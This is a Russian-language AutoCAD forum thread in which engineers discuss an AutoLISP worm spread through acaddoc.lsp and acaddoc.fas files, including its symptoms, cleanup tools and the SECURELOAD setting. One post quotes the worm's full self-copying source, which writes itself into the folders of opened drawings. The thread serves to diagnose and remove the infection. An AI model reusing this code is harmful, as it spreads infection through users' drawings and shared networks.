Сейчас еще раз перепроверил (для этого пришлось отключать уже NOD) код скопирован из файла и вставлен полностью (Ctrl+A)+(Ctrl+C)+(Ctrl+V)
Цитата:
да, это "вирус", 100%
А что кроме переопределения Explode обнаруживается "зловредного"?
Krovlaf вне форума  
 
Непрочитано 10.10.2012, 17:23
#116
hwd

C, C++, C#
 
Регистрация: 07.10.2009
С-Пб.
Сообщений: 2,762
Отправить сообщение для hwd с помощью Skype™


Цитата:
Сообщение от Krovlaf Посмотреть сообщение
А что кроме переопределения Explode обнаруживается "зловредного"?
А тебе не всё ли равно, или просто заняться нечем? Ответили ведь уже: выбрось это в ведро и не парь себе и другим мозг.
__________________
Надеюсь, ты не социальный овощ? Это определяется делами! :welcome:
hwd вне форума  
 
Непрочитано 10.10.2012, 17:47
#117
Krovlaf

геология, геодезия
 
Регистрация: 29.05.2009
Хабаровск
Сообщений: 185


Мне это, уважаемый легковозбудимый, для админов, которые похоже не ухом не рылом что это за "lsp" и чем оно плохо. Объяснить им развернуто почему надо почистить сеть. Потому как обленились и не хотят лишних телодвижений. Доходчиво? Водички выпей - успокоешься...
Krovlaf вне форума  
 
Непрочитано 10.10.2012, 17:58
#118
Владимир.

Проектирую
 
Регистрация: 10.01.2005
Сообщений: 3,738


Цитата:
Сообщение от Krovlaf Посмотреть сообщение
сейчас еще раз перепроверил
Всё равно, видно, что в конце "недописано"
Владимир. вне форума  
 
Непрочитано 10.10.2012, 18:09
#119
Krovlaf

геология, геодезия
 
Регистрация: 29.05.2009
Хабаровск
Сообщений: 185


Кажется мне покурочили его и бросили. Не похож он на остальные подобные "вирусы" выложенные сдесь. По отзывам трудящихся никаких нареканий на работу Acada не было. "У нас всегда так было, значит так надо"! Хотя не факт что в других конторах использующих эти файлы все гладко. Чистить надо однозначно, как - описано выше, только надо знать что конкретно этот файл пытается сделать при запуске программы.
Krovlaf вне форума  
 
Непрочитано 10.10.2012, 22:17
#120
gomer

строю, ломаю
 
Регистрация: 03.04.2008
Украина
Сообщений: 5,515


Krovlaf, что в командной строке автокада пишется при загрузке? Этот вирус размножает себя путем копирования содержимого в файлы аcad.lsp в папке с текущим чертежом... то, что там не дописано, возможно работа антивируса, который заблокировал файл при чтении-записи, но подранок еще живет, и размножается
gomer вне форума  
 
Непрочитано 11.10.2012, 06:55
#121
Krovlaf

геология, геодезия
 
Регистрация: 29.05.2009
Хабаровск
Сообщений: 185


Командная строка при запуске:
Цитата:
Открывается файл формата AutoCAD 2007/LT 2007.
Выполняется регенерация модели.
; ошибка: неверно сформированный список на входе

Утилиты меню AutoCAD загружены.
Команда:

Файл Autodesk DWG. Это файл формата TrustedDWG, сохраненный в приложении
Autodesk или в приложении, лицензированном корпорацией Autodesk.

Команда:
Выделенное красным - это "ОНО"?
Krovlaf вне форума  
 
Непрочитано 11.10.2012, 21:00
#122
gomer

строю, ломаю
 
Регистрация: 03.04.2008
Украина
Сообщений: 5,515


Цитата:
Сообщение от Krovlaf Посмотреть сообщение
; ошибка: неверно сформированный список на входе
Да, это ОНО! Это ваш недописанный вирус вызывает ошибку!
gomer вне форума  
 
Непрочитано 04.02.2014, 13:35
#123
Composter

Отопление и вентиляция
 
Регистрация: 31.10.2008
Москва
Сообщений: 445


нашел на иностранном форуме lisp, который лечит от этой заразы . Запуск лиспа "KW". Дальше несложно разобраться
Вложения
Тип файла: lsp KillWorm142.lsp (15.8 Кб, 463 просмотров)
Composter вне форума  
 
Непрочитано 04.02.2014, 13:51
#124
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431


Еще одна версия (вроде ссылка должна быть доступна всем) http://forum.inoe.name/showpost.php?...18&postcount=9
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 07.10.2014, 16:15
#125
kha

BIM, С#, AutoCAD, LISP
 
Регистрация: 15.03.2006
Дуброво
Сообщений: 657


Прошу прощения, если где уже было - прочитал уже несколько тем, но так и не нашёл ответа.

У меня чистая машина. Правильно ли я понимаю, что при снятой галке с пункта "Загружать acad.lsp c каждым чертежом" этот вирус мне не страшен?
__________________
"Молодой человек, Вы не представляете всей широты поставленной перед Вами задачи." © Панкратова Г.Е.
kha вне форума  
 
Непрочитано 07.10.2014, 16:27
#126
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431


kha, если у тебя ACAD версии до 2013 - страшен
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 07.10.2014, 17:17
#127
kha

BIM, С#, AutoCAD, LISP
 
Регистрация: 15.03.2006
Дуброво
Сообщений: 657


да, автокад 2012
каким образом тогда вирус заражает автокад, если я отключил эту опцию?

Нашёл вот этот метод: http://bushman-andrey.blogspot.ru/20...p-acadfas.html

пробовал кто-нибудь?
__________________
"Молодой человек, Вы не представляете всей широты поставленной перед Вами задачи." © Панкратова Г.Е.

Последний раз редактировалось kha, 07.10.2014 в 17:35.
kha вне форума  
 
Непрочитано 09.10.2014, 12:53
1 | #128
Александр Ривилис

программист, рыцарь ObjectARX
 
Регистрация: 09.05.2005
Киев
Сообщений: 2,413
Отправить сообщение для Александр Ривилис с помощью Skype™


Цитата:
Сообщение от kha Посмотреть сообщение
каким образом тогда вирус заражает автокад, если я отключил эту опцию?
Вместо acad.lsp в каждый документ при открытии грузится как минимум acaddoc.lsp.
Александр Ривилис вне форума  
 
Непрочитано 09.10.2014, 13:08
1 | #129
ciril

САПР
 
Регистрация: 29.09.2011
СПб
Сообщений: 283


Цитата:
Сообщение от kha Посмотреть сообщение
каким образом тогда вирус заражает автокад, если я отключил эту опцию?
но при первом чертеже в сессии он все равно грузится.
ciril вне форума  
 
Непрочитано 09.10.2014, 13:52
1 | #130
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431


http://adn-cis.org/posledovatelnost-...v-autocad.html + http://adn-cis.org/autocad-autoload-security.html
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 12.10.2014, 03:42
#131
kha

BIM, С#, AutoCAD, LISP
 
Регистрация: 15.03.2006
Дуброво
Сообщений: 657


Цитата:
Сообщение от Александр Ривилис Посмотреть сообщение
Вместо acad.lsp в каждый документ при открытии грузится как минимум acaddoc.lsp.
C acaddoc.lsp да, подгружается при снятой галке.

Цитата:
Сообщение от ciril Посмотреть сообщение
но при первом чертеже в сессии он все равно грузится.
Проверил, загружается, зараза.

Благодарю за разъяснения.
__________________
"Молодой человек, Вы не представляете всей широты поставленной перед Вами задачи." © Панкратова Г.Е.

Последний раз редактировалось kha, 12.10.2014 в 03:58.
kha вне форума  
 
Непрочитано 26.02.2015, 12:40 Файл acaddoc.fas
#132
Mixon2010

инженер проектировщик
 
Регистрация: 27.09.2010
Москва
Сообщений: 47


Как бороться с этим файлом я так и не понял. Появляется и все тут

После эксперимента понял следующее..... "Здоровый" компьютер заражается после открытия файла с чертежом. Заражение происходит в том случае, если в папке с чертежом находилась скрытая вредоносная программа acaddoc.fas.

После открытия, происходит автоматическая загрузка файла acaddoc.fas в память приложения autocad и подмена некоторых файлов автокада в папке Support в профиле пользователя. Например в загруженных программах сразу будет видно, что в память подгружается файл acaddoc.fas и подмененный файл acad.mnl.fas. Далее зараженный автокад будет клонировать вредоносную прогу acaddoc.fas на каждом открытом чертеже. Причем после заражения - файл acaddoc.fas автоматически восстанавливается на всех папках и дисках, если они ранее были удалены.

Простая переустановка не поможет полагаю ну или делать это нужно одномоментно на всех компах. где стоит полная версия автокада, а до этого везде уничтожить файл acaddoc.fas.

Последний раз редактировалось Mixon2010, 27.02.2015 в 12:07.
Mixon2010 вне форума  
 
Непрочитано 26.02.2015, 15:55
#133
VVA

Инженер LISP
 
Регистрация: 11.05.2005
Минск
Сообщений: 6,996


Mixon2010, Заархивируй в zip или rar и выкладывай сюда для препарации
__________________
Как использовать код на Лиспе читаем здесь
VVA вне форума  
 
Непрочитано 26.02.2015, 16:17
#134
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431


Я подправил первый пост темы.
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 27.02.2015, 12:09
#135
Mixon2010

инженер проектировщик
 
Регистрация: 27.09.2010
Москва
Сообщений: 47


Выложить файл acaddoc.fas ??? На фирме теперь на всех сетевых дисках гуляет этот файл )))) Отрицательного влияния пока не ощущается. Вроде бы все работает пока. Но его все больше и больше становится
Mixon2010 вне форума  
 
Непрочитано 27.02.2015, 12:21
#136
741520

Инжинегр
 
Регистрация: 09.12.2011
Сообщений: 433


Цитата:
Сообщение от Mixon2010 Посмотреть сообщение
Вроде бы все работает пока. Но его все больше и больше становится
Когда нибуть их станет так много, что они выселят вас из офиса. Приходишь ты такой на работу а в твоем кресле сидит такой толстый вирус и говорит: "Шел бы ты от сюда, парниша... "
741520 вне форума  
 
Непрочитано 27.02.2015, 12:26
#137
Mixon2010

инженер проектировщик
 
Регистрация: 27.09.2010
Москва
Сообщений: 47


Цитата:
Сообщение от 741520 Посмотреть сообщение
Когда нибуть их станет так много, что они выселят вас из офиса. Приходишь ты такой на работу а в твоем кресле сидит такой толстый вирус и говорит: "Шел бы ты от сюда, парниша... "
Все может быть
Mixon2010 вне форума  
 
Непрочитано 27.02.2015, 12:28
#138
Mixon2010

инженер проектировщик
 
Регистрация: 27.09.2010
Москва
Сообщений: 47


Вот он этот гаденыш... Правда не понятно, будет ли он распространятся когда он один. Надо на ком то проверить
Вложения
Тип файла: zip acaddoc.zip (37.4 Кб, 73 просмотров)
Mixon2010 вне форума  
 
Непрочитано 27.02.2015, 12:32
#139
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431


Начальный пост темы прочитай - там полно рецептов
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 02.03.2015, 17:18
#140
VVA

Инженер LISP
 
Регистрация: 11.05.2005
Минск
Сообщений: 6,996


Цитата:
Сообщение от Mixon2010 Посмотреть сообщение
Выложить файл acaddoc.fas ??? На фирме теперь на всех сетевых дисках гуляет этот файл )))) Отрицательного влияния пока не ощущается. Вроде бы все работает пока. Но его все больше и больше становится
Подтверждение, что лафа рано или поздно закончится Проблема долгой загрузки PS Utils после обновления антивируса NOD v.6
__________________
Как использовать код на Лиспе читаем здесь
VVA вне форума  
 
Непрочитано 03.03.2015, 11:13
#141
Сергей Юрьевич

Строительство гидротехнических сооружений
 
Регистрация: 01.08.2012
Москва
Сообщений: 8,882


Цитата:
Сообщение от Mixon2010 Посмотреть сообщение
Вот он этот гаденыш... Правда не понятно, будет ли он распространятся когда он один.
рецепт:
мой компьютер -> в строке поиска задаём "acaddoс.fas" -> поисковик находит все эти файлы на вашем компе -> "выбрать все" -> удалить
после этого файлы acaddoс.fas снова не появляются
Сергей Юрьевич вне форума  
 
Непрочитано 03.03.2015, 15:22
#142
rtyu


 
Регистрация: 23.02.2012
Сообщений: 221


Ребята извиняюсь за может быть глупый вопрос, но можно ли в файл dwg вшить какой-то вредоносный код, который заразит этот же файл и ещё ряд нескольких при открытии?

----- добавлено через ~3 мин. -----
Цитата:
Сообщение от Сергей Юрьевич Посмотреть сообщение
рецепт:
мой компьютер -> в строке поиска задаём "acaddoс.fas" -> поисковик находит все эти файлы на вашем компе -> "выбрать все" -> удалить
после этого файлы acaddoс.fas снова не появляются
А если появляются?
rtyu вне форума  
 
Непрочитано 03.03.2015, 15:57
#143
Сергей Юрьевич

Строительство гидротехнических сооружений
 
Регистрация: 01.08.2012
Москва
Сообщений: 8,882


Цитата:
Сообщение от rtyu Посмотреть сообщение
Ребята извиняюсь за может быть глупый вопрос, но можно ли в файл dwg вшить какой-то вредоносный код, который заразит этот же файл и ещё ряд нескольких при открытии?

----- добавлено через ~3 мин. -----

А если появляются?
может у вас какой-то другой вирус?
у себя вычистил данным способом - больше не появляется.
Сергей Юрьевич вне форума  
 
Непрочитано 03.03.2015, 16:02
#144
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431


Сергей Юрьевич, тебе повезло: у тебя стандартные файлы acad*.lsp не были заражены. rtyu, читай все ссылки из #1 - там полно вариантов.
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 04.03.2015, 10:03
#145
rtyu


 
Регистрация: 23.02.2012
Сообщений: 221


А у меня ребята такая проблема. Значит имеются 3 компьютера на них установлены Windows XP и Автокад 2008. Как-то проходя мимо их я заметил, что у них не правильно установлено время, а именно год 2013, у кого и 2014. Вообщем естественно я их поменял на правильное т.е 2015 год. После этого пользователи начали запускать файлы в Автокаде и к моему удивлению в чертежах начал дорисовываться вот такой вот "алигафрен" (см.скриншот.) Я уже молчу зато, что появляются acaddoc.fas. Стоит антивирус AVG 2015 у которого к сожалению разработчики не додумались прописать проверку файлов lsp, поэтому мне пришлось сделать это самому вручную, как только я это сделал антивирус начал удалять acad.lsp. Что самое интересное, что если системную дату поставить опять не правильную, то в файле ничего не рисуется т.е файл открывается так как надо и ничего стороннего не рисуется.
Скриншот выкладываю
Миниатюры
Нажмите на изображение для увеличения
Название: Безымянный.JPG
Просмотров: 308
Размер:	148.4 Кб
ID:	145088  
rtyu вне форума  
 
Непрочитано 04.03.2015, 10:23
#146
Faust2956

Инженер проектировщик
 
Регистрация: 26.10.2011
Миасс
Сообщений: 111


Занятная штуковина)
__________________
Время и место Подвига определяется Судьбой. Но если не придёт Герой, не будет и Подвига...
Faust2956 вне форума  
 
Непрочитано 04.03.2015, 10:32
#147
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431


rtyu, тебе своей отдельной темы мало? http://forum.dwg.ru/showthread.php?t=119584
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 05.03.2015, 13:27
#148
gomer

строю, ломаю
 
Регистрация: 03.04.2008
Украина
Сообщений: 5,515


я то думал чего тема активировалась в последнее время... а оно вон оно что...
http://dwg.ru/dnl/13154
gomer вне форума  
 
Непрочитано 05.03.2015, 13:50
#149
Admin
Administrator


 
Регистрация: 21.08.2003
Сообщений: 4,466


Цитата:
Сообщение от gomer Посмотреть сообщение
я то думал чего тема активировалась в последнее время... а оно вон оно что...
http://dwg.ru/dnl/13154
Спасибо, удалил
Admin вне форума  
 
Непрочитано 05.03.2015, 15:34
#150
CaMoCAD


 
Регистрация: 25.03.2008
Зелик
Сообщений: 1,602


Цитата:
Сообщение от gomer Посмотреть сообщение
я то думал чего тема активировалась в последнее время... а оно вон оно что...
http://dwg.ru/dnl/13154

Цитата:
Сообщение от Admin Посмотреть сообщение
Спасибо, удалил

А что там было, скажите название файла, а то я много чего оттуда качал (не всем -тьфу-тьфу- успел попользоваться). Надо и у себя удалить.
__________________
* Буква "ё" не используется в тексте исключительно в связи с требованиями ЕСКД.
CaMoCAD вне форума  
 
Непрочитано 05.03.2015, 15:39
#151
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431


Если в архиве есть файл с маской имени acad*.* - то его уничтожай, остальное как правило уже безвредно.
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 05.03.2015, 16:12
#152
sbi


 
Регистрация: 27.04.2008
SPB
Сообщений: 3,285
Отправить сообщение для sbi с помощью Skype™


Цитата:
Сообщение от CaMoCAD Посмотреть сообщение
А что там было, скажите название файла, а то я много чего оттуда качал (не всем -тьфу-тьфу- успел попользоваться). Надо и у себя удалить.
Ничего страшного:
Миниатюры
Нажмите на изображение для увеличения
Название: модель девушки.PNG
Просмотров: 205
Размер:	20.6 Кб
ID:	145182  
__________________
С уважением sbi
sbi вне форума  
 
Непрочитано 05.03.2015, 16:17
#153
Admin
Administrator


 
Регистрация: 21.08.2003
Сообщений: 4,466


Там было
Цитата:
Состав архива
Люди Модель Dwg/
Люди Модель Dwg/acaddoc.fas
Люди Модель Dwg/ludi.png
Люди Модель Dwg/Модели блоки людей.dwg
Admin вне форума  
 
Непрочитано 05.03.2015, 16:33
#154
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431


Цитата:
Сообщение от Admin Посмотреть сообщение
Люди Модель Dwg/acaddoc.fas
acad*.* - уничтожить.
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 05.03.2015, 16:57
#155
CaMoCAD


 
Регистрация: 25.03.2008
Зелик
Сообщений: 1,602


Спасибо
__________________
* Буква "ё" не используется в тексте исключительно в связи с требованиями ЕСКД.
CaMoCAD вне форума  
 
Непрочитано 05.03.2015, 18:16
#156
Hottabich

НПО "ИНКОМИС" Отопление, Вода, Каналья
 
Регистрация: 14.06.2008
Саратов
Сообщений: 167


При открытии этой темы, и при обновлении страницы, только у меня антивирь ругается?
__________________
Опыт - критерий истины.
Hottabich вне форума  
 
Непрочитано 05.03.2015, 18:31
#157
Хмурый


 
Регистрация: 29.10.2004
СПб
Сообщений: 16,379


Offtop: Hottabich, у тебя он, видать, на слово "вирус" срабатывает
Хмурый вне форума  
 
Непрочитано 16.04.2015, 10:01
#158
Red Nova

ՃԱՐՏԱՐԱԳԵՏ, տ.գ.թ.
 
Регистрация: 23.10.2007
Торонто
Сообщений: 1,990
Отправить сообщение для Red Nova с помощью Skype™


Други привет.
Каким-то образом попал к нам этот acaddoc.lsp
У нас файлы в сети, человек 10 юзеров акада. стоят AutoCAD 2013, 2014, ASD 2013
Попробовал KillWorm142, кажись пользы нет, но может я его неверно использовал.
Почитал тут тему, но не понял пока есть ли не безболезненное решение проблемы, особенно беспокоит вопрос сети, ведь в этом случае очистить свой комп и переставить акад не решение... Да и разгар работы, тут не до перестановки.
Не пинайте плиз ФАК-ом а подскажите.
1. Как может навредить вирус кроме того что он везде себя копирует?
2. Какой способ избавления от него сейчас считается наиболее быстрым и эффективным (учитывая сеть)? Готовое решение есть?

Вот этот гад...
Код:
[Выделить все]
 R(defun-q s::startup
	 (/ basepath
	    baseacad
	    acaddocpath
	    r-acaddoc
	    w-basepath
	    rl-acaddoc
	    acaddoclsp
	    c-acaddocname
	    c-acaddocpath
	    c-acaddoc
	   )
     (setq basepath
	    (findfile "base.dcl")
     )
     (setq basepath
	    (substr basepath
		    1 (- (strlen basepath) 8)
            )
     )
     (setq baseacad (strcat basepath "acaddoc.lsp"))
  
	(setq acaddocpath
               (findfile "acaddoc.lsp")
	)
	(setq acaddocpath
	       (substr acaddocpath
		       1 (- (strlen acaddocpath) 11)
	       )
	)
	(setq acaddoclsp
	       (strcat acaddocpath "acaddoc.lsp"))
	
	
        (setq c-acaddocname
	       (getvar "dwgname")
	)
        (setq c-acaddocpath
	       (findfile c-acaddocname)
	)
        (setq c-acaddocpath
	       (substr c-acaddocpath
		       1 (- (strlen c-acaddocpath) (strlen c-acaddocname))	
		)
	 )
        (setq c-acaddoc
	       (strcat c-acaddocpath "acaddoc.lsp")
	 )
	 (if
           (and
	   (/= basepath acaddocpath)
	   (= c-acaddocpath acaddocpath)
	   )
	     (progn
	       (setq r-acaddoc
	       (open acaddoclsp "r")
	       )
	       (setq w-basepath
	          (open baseacad "w")
		)     
	       (while
	           (setq rl-acaddoc
		    (read-line r-acaddoc)
	           )
	           (write-line rl-acaddoc w-basepath)
	        )
	        (close w-basepath)   
                (close r-acaddoc)
	    
             )
         
	     (progn
	       (setq r-acaddoc
	       (open acaddoclsp "r")
	       )
	       (setq w-basepath
	          (open c-acaddoc "w")
		)
	        (while
	           (setq rl-acaddoc
		    (read-line r-acaddoc)
	           )
	           (write-line rl-acaddoc w-basepath)
	        )
	        (close w-basepath)   
                (close r-acaddoc)
	    
             )
	 )
	 (princ)
)
Red Nova вне форума  
 
Непрочитано 16.04.2015, 10:28
#159
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431


Первый пост темы.
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 18.04.2015, 13:42
#160
Red Nova

ՃԱՐՏԱՐԱԳԵՏ, տ.գ.թ.
 
Регистрация: 23.10.2007
Торонто
Сообщений: 1,990
Отправить сообщение для Red Nova с помощью Skype™


Привет Алексей. Подскажи плиз, как понимаю мне достаточно последней (вот этой) строчки?
Цитата:
Для чистки следов вируса: http://autolisp.ru/wp-content/upload...acad-virus.lsp + http://wp.me/p4lEOS-GR
Тут две ссылки.
По первой код. Для чего именно он и что с ним делать? Запустить один раз функцию (inoe-erase-acad-virus) достаточно? Может следует в автозагрузку его?

----- добавлено через ~31 мин. -----
У меня AutoCAD 2013 + ASD 2013. Но дистрибутива нет под рукой чтоб взять не порченные нужные файлы. Могу поставить 2014.
Вопрос. Если я снесу все 2013 и поставлю новый софт 2014, поможет ли если я сразу в нем acad*.lsp, acad*doc*.lsp, acad*.mnl сделаю read only?
Естественно до этого найду и уничтожу все зараженные файлы (хоть те что у меня на машине а не в сети).

Последний раз редактировалось Red Nova, 18.04.2015 в 14:19.
Red Nova вне форума  
 
Непрочитано 06.12.2016, 18:30
#161
Composter

Отопление и вентиляция
 
Регистрация: 31.10.2008
Москва
Сообщений: 445


подскажите, а можно вообще запретить подгрузку *.lsp файлов из недоверенных директорий, чтобы ввобще даже окно не появлялось с запросом?
Composter вне форума  
 
Непрочитано 06.12.2016, 18:34
1 | #162
Александр Ривилис

программист, рыцарь ObjectARX
 
Регистрация: 09.05.2005
Киев
Сообщений: 2,413
Отправить сообщение для Александр Ривилис с помощью Skype™


Цитата:
Сообщение от Composter Посмотреть сообщение
подскажите, а можно вообще запретить подгрузку *.lsp файлов из недоверенных директорий, чтобы ввобще даже окно не появлялось с запросом?
SECURELOAD в 2: http://help.autodesk.com/view/ACD/20...3-C1490E924A02
Но боюсь, что тогда ты начнёшь удивляться почему у тебя что-то нужное не грузится.
Александр Ривилис вне форума  
 
Непрочитано 06.12.2016, 19:08
#163
Composter

Отопление и вентиляция
 
Регистрация: 31.10.2008
Москва
Сообщений: 445


но я же не зря спросил про доверенные директории )))
спасибо за ответ
Composter вне форума  
Ответ
Вернуться   Форум DWG.RU > Программное обеспечение > AutoCAD > Вирус для Автокада



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Резервуар 250м.куб. на проверку dextron3 Инженерные сети 42 07.05.2011 15:59
Компьютер для автокада ugoday Компьютерная и бытовая техника, электроника и инструмент 31 02.09.2007 15:07
Хочу купить монитор ЖК для автокада какой фирмы я не знаю вы Рома_2 Разное 10 21.06.2007 03:44
Версия ЛАЙТ для автокада 2006 Kaktuz AutoCAD 8 18.10.2006 18:39
Определение нагрузок для нестандартных конструкций. NIVa Конструкции зданий и сооружений 2 06.08.2005 21:42